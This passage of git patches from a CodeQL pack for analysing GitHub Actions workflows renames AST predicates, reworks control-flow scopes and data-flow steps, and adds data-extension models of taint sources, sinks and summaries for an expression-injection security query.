a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate isSink(DataFlow::Node sink) { any() } //predicate neverSkip(DataFlow::Node node) { any() } } diff --git a/ql/src/test/partial.ql b/ql/src/test/partial.ql new file mode 100644 index 000000000000..779749f82f66 --- /dev/null +++ b/ql/src/test/partial.ql @@ -0,0 +1,33 @@ +/** + * @name Forward Partial Dataflow + * @description Forward Partial Dataflow + * @kind path-problem + * @precision low + * @problem.severity error + * @id actions/test-dataflow + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import PartialFlow::PartialPathGraph + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + } + + predicate isSink(DataFlow::Node sink) { none() } +} + +private module MyFlow = TaintTracking::Global; // or DataFlow::Global<..> + +int explorationLimit() { result = 10 } + +private module PartialFlow = MyFlow::FlowExplorationFwd; + +from PartialFlow::PartialPathNode source, PartialFlow::PartialPathNode sink +where PartialFlow::partialFlow(source, sink, _) +select sink.getNode(), source, sink, "This node receives taint from $@.", source.getNode(), + "this source" From 9c6fd20e5e6a9b96423c1f3b0cabaf722ff0908f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 12:29:48 +0100 Subject: [PATCH 016/707] Move reusable tests to src pack --- ql/{lib => src}/test/.github/workflows/calling_workflow.yml | 0 ql/{lib => src}/test/.github/workflows/reusable_workflow.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename ql/{lib => src}/test/.github/workflows/calling_workflow.yml (100%) rename ql/{lib => src}/test/.github/workflows/reusable_workflow.yml (100%) diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/calling_workflow.yml rename to ql/src/test/.github/workflows/calling_workflow.yml diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/src/test/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/reusable_workflow.yml rename to ql/src/test/.github/workflows/reusable_workflow.yml From b54316fc9ab101bcb6a2e11ac57a888c681cc477 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 13:35:47 +0100 Subject: [PATCH 017/707] Refactor CfgScopes and Ast predicate names --- ql/lib/codeql/actions/Ast.qll | 53 +++++++------- .../actions/controlflow/internal/Cfg.qll | 70 +++++++++++-------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 45 ++++-------- .../dataflow/internal/DataFlowPublic.qll | 18 ++--- .../Security/CWE-094/ExpressionInjection.ql | 2 - 6 files changed, 94 insertions(+), 96 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b84f884c034f..a25ef856233b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -31,11 +31,9 @@ class Expression extends Statement { } * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { - JobStmt getAJob() { result = super.getJob(_) } + JobStmt getAJobStmt() { result = super.getJob(_) } - JobStmt getJob(string id) { result = super.getJob(id) } - - predicate isReusable() { this instanceof ReusableWorkflowStmt } + JobStmt getJobStmt(string id) { result = super.getJob(id) } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -45,15 +43,19 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + ReusableWorkflowInputsStmt getInputsStmt() { + result = workflow_call.(YamlMapping).lookup("inputs") + } - OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + ReusableWorkflowOutputsStmt getOutputsStmt() { + result = workflow_call.(YamlMapping).lookup("outputs") + } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class InputsStmt extends Statement instanceof YamlMapping { - InputsStmt() { +class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowInputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } @@ -70,16 +72,16 @@ class InputsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - InputExpr getInputExpr(string name) { + ReusableWorkflowInputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class InputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } -class OutputsStmt extends Statement instanceof YamlMapping { - OutputsStmt() { +class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowOutputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) } @@ -96,12 +98,12 @@ class OutputsStmt extends Statement instanceof YamlMapping { * description: "The second output string" * value: ${{ jobs.example_job.outputs.output2 }} */ - OutputExpr getOutputExpr(string name) { + ReusableWorkflowOutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class OutputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -114,10 +116,10 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStep(int index) { result = super.getStep(index) } + StepStmt getStepStmt(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStep() { result = super.getStep(_) } + StepStmt getAStepStmt() { result = super.getStep(_) } /** * Gets a needed job. @@ -147,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJob() = this } + JobUsesExpr getUsesExpr() { result.getJobStmt() = this } } /** @@ -178,7 +180,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJob() { result = super.getJob() } + JobStmt getJobStmt() { result = super.getJob() } } /** @@ -189,7 +191,7 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); - abstract Expression getArgument(string key); + abstract Expression getArgumentExpr(string key); } /** @@ -204,7 +206,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getVersion() { result = uses.getVersion() } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) @@ -220,7 +222,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJob() { result = this } + JobStmt getJobStmt() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -255,7 +257,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -290,8 +292,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } - JobStmt getJob() { result.getAChildNode*() = this } - //override string toString() { result = expr } + JobStmt getJobStmt() { result.getAChildNode*() = this } } /** @@ -313,7 +314,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { string getVarName() { result = varName } - StepStmt getStep() { result.getId() = stepId } + StepStmt getStepStmt() { result.getId() = stepId } } /** @@ -368,7 +369,7 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { Expression getInputExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputs().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 057d7872ee3b..9129ee5dc617 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,7 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - - class JobScope extends CfgScope instanceof JobStmt { } + class WorkflowScope extends CfgScope instanceof WorkflowStmt { } } private module Implementation implements CfgShared::InputSig { @@ -122,15 +120,9 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getInputs(), e) or - first(scope.(JobStmt), e) - } + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(ReusableWorkflowStmt), e, c) or - last(scope.(JobStmt), e, c) - } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -147,21 +139,38 @@ private import CfgImpl private import Completion private import CfgScope -private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getInputs() or child = super.getOutputs()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) + if this instanceof ReusableWorkflowStmt + then + result = + rank[i](Expression child, Location l | + ( + child = this.(ReusableWorkflowStmt).getInputsStmt() or + child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getAJobStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + else + result = + rank[i](Expression child, Location l | + child = super.getAJobStmt() and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -174,9 +183,10 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof InputExpr { } +private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -189,13 +199,17 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and + ( + child = super.getAStepStmt() or + child = super.getOutputStmt() or + child = super.getUsesExpr() + ) and l = child.getLocation() | child @@ -213,7 +227,7 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by @@ -226,7 +240,7 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ead312d8af6b..84019aa27273 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -27,7 +27,7 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgument(["source", "replace"]) and + pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and succ.asExpr() = u ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 02b7de847e3e..76495e3f80ca 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -20,14 +20,14 @@ class OutNode extends ExprNode { } /** - * Not used + * Not implemented */ class CastNode extends Node { CastNode() { none() } } /** - * Not used + * Not implemented */ class PostUpdateNode extends Node { PostUpdateNode() { none() } @@ -45,8 +45,6 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) - // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) - // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } @@ -84,10 +82,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else - if this instanceof JobStmt - then result = this.(JobStmt).getId() - else none() + else none() } } @@ -105,16 +100,6 @@ class NormalReturn extends ReturnKind, TNormalReturn { /** Gets a viable implementation of the target of the given `Call`. */ DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } -// /** -// * Holds if the set of viable implementations that can be called by `call` -// * might be improved by knowing the call context. -// */ -// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } -// /** -// * Gets a viable dispatch target of `call` in the context `ctx`. This is -// * restricted to those `call`s for which a context might make a difference. -// */ -// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } /** * Gets a node that can read the value returned from `call` with return kind * `kind`. @@ -162,17 +147,17 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Made a string to match the ArgumentPosition type + * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } + ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } } /** @@ -185,7 +170,7 @@ predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } @@ -195,7 +180,7 @@ predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } @@ -223,7 +208,12 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * a simple local flow step that should always preserve the call context (same callable) @@ -238,12 +228,7 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * AKA teleport steps * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) -} +predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 80f504963b9b..a14b06938746 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -27,7 +27,7 @@ class Node extends TNode { } /** - * Any Ast Expression + * Any Ast Expression. * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... */ class ExprNode extends Node, TExprNode { @@ -48,34 +48,34 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private ReusableWorkflowInputExpr parameter; ParameterNode() { this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } override string toString() { result = parameter.toString() } override Location getLocation() { result = parameter.getLocation() } - InputExpr getInputExpr() { result = parameter } + ReusableWorkflowInputExpr getInputExpr() { result = parameter } } /** - * An argument to a Uses step (call) + * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -87,7 +87,7 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 2fe6f17dfb61..f8d6e0c804b6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,8 +24,6 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } - //predicate isSink(DataFlow::Node sink) { any() } - //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 2eaca7e826c8f990d999696990e1e6a2d43c9992 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 22:49:54 +0100 Subject: [PATCH 018/707] Add support for external definitions --- .../codeql/actions/dataflow/ExternalFlow.qll | 31 ++++++++++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 23 +++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 ++++++++++++------- .../internal/ExternalFlowExtensions.qll | 20 ++++++++++++ ql/lib/ext/sinks.model.yml | 11 +++++++ ql/lib/ext/sources.model.yml | 11 +++++++ ql/lib/ext/summaries.model.yml | 19 +++++++++++ ql/lib/qlpack.yml | 8 +++-- ql/lib/test/test.ql | 13 ++++++-- .../Security/CWE-094/ExpressionInjection.ql | 6 +++- 10 files changed, 150 insertions(+), 24 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/ExternalFlow.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll create mode 100644 ql/lib/ext/sinks.model.yml create mode 100644 ql/lib/ext/sources.model.yml create mode 100644 ql/lib/ext/summaries.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll new file mode 100644 index 000000000000..6e02e4036ba3 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -0,0 +1,31 @@ +private import internal.ExternalFlowExtensions as Extensions +import codeql.actions.DataFlow +import actions + +/** Holds if a source model exists for the given parameters. */ +predicate sourceModel(string action, string version, string output, string kind) { + Extensions::sourceModel(action, version, output, kind) +} + +/** Holds if a sink model exists for the given parameters. */ +predicate summaryModel(string action, string version, string input, string output, string kind) { + Extensions::summaryModel(action, version, input, output, kind) +} + +/** Holds if a sink model exists for the given parameters. */ +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate sinkNode(DataFlow::ExprNode sink, string kind) { + exists(UsesExpr uses, string action, string version, string input | + uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + sinkModel(action, version, input, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) + ) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3e6a6141767c..3bde829321fe 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,6 @@ import actions import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A data flow source. @@ -124,14 +125,22 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getCallee() = "tj-actions/changed-files" and - uses.getVersion() = ["v10", "v20", "v30", "v40"] and - uses = this.asExpr() +private class ExternallyDefinedSource extends RemoteFlowSource { + string soutceType; + + ExternallyDefinedSource() { + exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | + sourceModel(action, version, _, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + uses = this.asExpr() and + soutceType = kind ) } - override string getSourceType() { result = "User-controlled list of changed files" } + override string getSourceType() { result = soutceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 84019aa27273..e5fa04427ccf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -5,6 +5,7 @@ import actions private import codeql.util.Unit private import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. @@ -20,16 +21,23 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * Holds if actions-find-and-replace-string step is used. - */ -private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesExpr uses, string action, string version, string input | + /*, string output */ summaryModel(action, version, input, _, "taint") and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and + succ.asExpr() = uses + ) +} + +private class ExternallyDefinedSummary extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr u | - u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and - succ.asExpr() = u - ) + externallyDefinedSummary(pred, succ) } } @@ -46,10 +54,12 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { * echo "::set-output name=initial_url::$INITIAL_URL" */ private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { + runEnvToScriptstep(pred, succ) + } } -predicate test(DataFlow::Node pred, DataFlow::Node succ) { +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(RunExpr r, string varName | r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll new file mode 100644 index 000000000000..89cf4de02616 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -0,0 +1,20 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if a source model exists for the given parameters. + */ +extensible predicate sourceModel(string action, string version, string output, string kind); + +/** + * Holds if a summary model exists for the given parameters. + */ +extensible predicate summaryModel( + string action, string version, string input, string output, string kind +); + +/** + * Holds if a sink model exists for the given parameters. + */ +extensible predicate sinkModel(string action, string version, string input, string kind); diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml new file mode 100644 index 000000000000..e28ec39d1bee --- /dev/null +++ b/ql/lib/ext/sinks.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ + "FAKE-mad9000/actions-find-and-replace-string", + "*", + "source", + "expression-injection", + ] diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml new file mode 100644 index 000000000000..666a5532865e --- /dev/null +++ b/ql/lib/ext/sources.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ + "tj-actions/changed-files", + "v10, v20, v30, v40", + "all_changed_file", + "PR", + ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml new file mode 100644 index 000000000000..cc8e2df5fe9e --- /dev/null +++ b/ql/lib/ext/summaries.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ + "mad9000/actions-find-and-replace-string", + "*", + "source, replace", + "value", + "taint", + ] + - [ + "frabert/replace-string-action", + "*", + "string, replace-with", + "replaced", + "taint", + ] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 325c63f4625d..8cf5ba69354f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -5,11 +5,13 @@ name: codeql/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 - codeql/yaml: '*' - codeql/util: '*' + codeql/yaml: "*" + codeql/util: "*" codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml tests: test groups: - - yaml + - yaml +dataExtensions: + - ext/*.model.yml diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 8d558cbaacdb..fe76852fa537 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -3,6 +3,7 @@ import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations +import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } @@ -19,7 +20,7 @@ query predicate stepUsesNodes(StepUsesExpr s) { any() } query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { - call.getArgument(argname) = arg + call.getArgumentExpr(argname) = arg } query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } @@ -48,7 +49,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof OutputsStmt + n.getAstNode() instanceof ReusableWorkflowOutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -68,3 +69,11 @@ query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } + +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) +} + +query predicate summaries(string action, string version, string input, string output, string kind) { + summaryModel(action, version, input, output, kind) +} diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b6..7953c3b037c7 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ 